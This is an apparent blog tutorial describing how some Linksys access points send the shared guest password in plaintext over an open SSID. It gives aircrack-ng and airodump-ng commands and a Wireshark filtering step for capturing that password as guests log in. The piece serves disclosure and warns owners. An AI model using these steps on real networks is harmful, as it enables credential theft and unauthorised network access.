For years there’s been a flaw in the way some Linksys access points facilitate access for guest users. A bit of research reveals complaints of this method dating back to 2013, and apparently the problem still hasn’t been fixed on some modern Linksys access points.
Nearly every access point on the market advertises a WPA2-PSK protected SSID for guest users to connect. The administrator would configure the pre-shared key and provide it to guest users. The users would then use the pre-shared key to authenticate to the AP, a process of which we’re all familiar. The benefit of this is obvious – all communication with the AP is encrypted, including the authentication process. (Well, at least as secure as WPA2 can be.)
Linksys, on some APs, has chosen to handle this a little differently. Rather than provide an SSID with WPA2-PSK encryption, the AP advertises an open, unencrypted SSID. When guests connect to this SSID, they’re offered a sign-in portal to provide a password, which is a pre-shared key that is shared among all guests. The problem with this implementation is that the web portal used to accept this key is not encrypted with either WPA2-PSK encryption (as the SSID is open and unencrypted) or HTTPS.
Other access points, including access points provided to Comcast Xfinity customers, also offer an unencrypted SSID to provide users a web portal, but at least the portal is encrypted with SSL and no plain-text passwords are transmitted across the air.
Sniffing Unencrypted Passwords on the Air
Note: If you are unfamiliar with using airmon-ng and airodump-ng commands, you might want to check out my earlier article, which goes more in depth in regards to the syntax of those tools.
As you can imagine, since the wireless guest password is transmitted through the air unencrypted, it’s very easy to sniff this traffic and gain access to free Internet access via the guest portal. The only hardware and software requirements include a wireless adapter capable of being put in to monitor mode, and the aircrack suite of tools, which are available by default in Kali Linux.
From within Kali we’ll put our compatible wireless adapter in to monitor mode.
airmon-ng start wlan0
We’ll then start airodump to identify our target SSID. The important pieces of data to gather are the channel on which the access point is operating, and the BSSID of the SSID being advertised. This information should be shown on the airodump output screen.
Once we’ve gathered the channel and the BSSID if the open SSID, we can begin sniffing traffic destined to/from that SSID. First, we’ll want to make sure we’re in root’s working directory on our Kali machine. When we begin capturing data with airodump, several files will be created, including a packet capture file that we can analyze in Wireshark.
cd ~ airodump-ng -c 6 --bssid DE:AD:BE:EF:00:00 -w LinksysCapture wlan0mon
In this command the -c flag specifies the channel on which our target SSID is using, the –bssid flag specifies the BSSID of the SSID which we gathered above, and the -w flag provides a name for our output files.
Once this command is run we will be Abel to see the output of airodump for the specific SSID we specified. Under the STATION column, we’ll be able to see when a station connects. When a station connects and enters the guest wireless password, we will be able to use Wireshark to exfiltrate it from the LinksysCapture-01.cap file that airodump creates for us.
Capturing the Password and Evaluating with Wireshark
At this point, it’s a waiting game, since we will have to wait for a valid user to connect to the insecure SSID, and enter the guest password. Once a user connects, we should be able to see their MAC address appear below the STATION column. The counter under the Frames column increments as they communicate with the SSID and frames are passed back and forth.
We can take as snapshot of the file as it being captured by opening a new terminal and copying the existing .cap file to another .cap file. For example:
cp LinksysCapture-01.cap cap.cap
We can use this to take a snapshot to evaluate in Wireshark while leaving the initial scan running, just in case someone connected but didn’t enter the correct password, or didn’t attempt to enter a password after they thought they might get free Internet via an open SSID.
We will open the snapshot of our output, cap.cap, and use a display filter in Wireshark, easily entered by typing it in the filter bar above the capture output. This filter will show only http POST requests, which is how the guest portal web page provides the password data to the Linksys AP.
If you are using the “Guest Access Portal” feature on a Linksys AP that handles guest logins in this way, you may want to consider replacing that AP with a more secure AP, or at least disabling the feature if you don’t want people getting a free ride on your Internet connection.